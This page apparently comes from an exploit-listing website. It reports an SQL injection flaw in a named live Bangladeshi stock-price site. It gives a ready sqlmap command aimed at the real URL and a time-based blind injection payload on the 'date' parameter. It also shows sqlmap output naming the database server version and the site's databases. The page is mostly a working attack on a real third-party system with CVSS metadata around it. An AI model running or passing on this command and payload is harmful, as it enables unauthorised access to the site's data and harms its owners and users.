Advertisement






Pricelist Stock Bangladesh Ltd. Center For Financial Analysis | SQL Injection Vulnerability

CVE Category Price Severity
N/A CWE-89 N/A N/A
Author Risk Exploitation Type Date
Unknown Unknown Remote 2021-09-05
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021090038

Below is a copy:

Pricelist Stock Bangladesh Ltd. Center For Financial Analysis | SQL Injection Vulnerability
# Exploit Title: Pricelist Stock Bangladesh Ltd. Center For Financial Analysis | SQL Injection Vulnerability
# Author:  
# Tested On: Kali Linux
# sqlmap -u "https://stockbangladesh.mobi/trade_details.php?id=2023163&date=2021-08-02&cmp=62" --dbs --banner --batch
---------------------------------------------------------------------------------------------------

.mobi Mobile. It is used in website construction for mobile phones.

Pricelist Stock Bangladesh Ltd.

Center For Financial Analysis

https://stockbangladesh.mobi/trade_details.php?id=2023163&date=2021-08-02&cmp=62

---
Parameter: date (GET)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=2023163&date=2021-08-02' AND (SELECT 2269 FROM (SELECT(SLEEP(5)))muJs) AND 'OBPY'='OBPY&cmp=62
---

the back-end DBMS is MySQL
web application technology: Apache, PHP
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
banner: '10.3.31-MariaDB'

available databases [2]:
[+] information_schema
[+] stock_sbnew

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.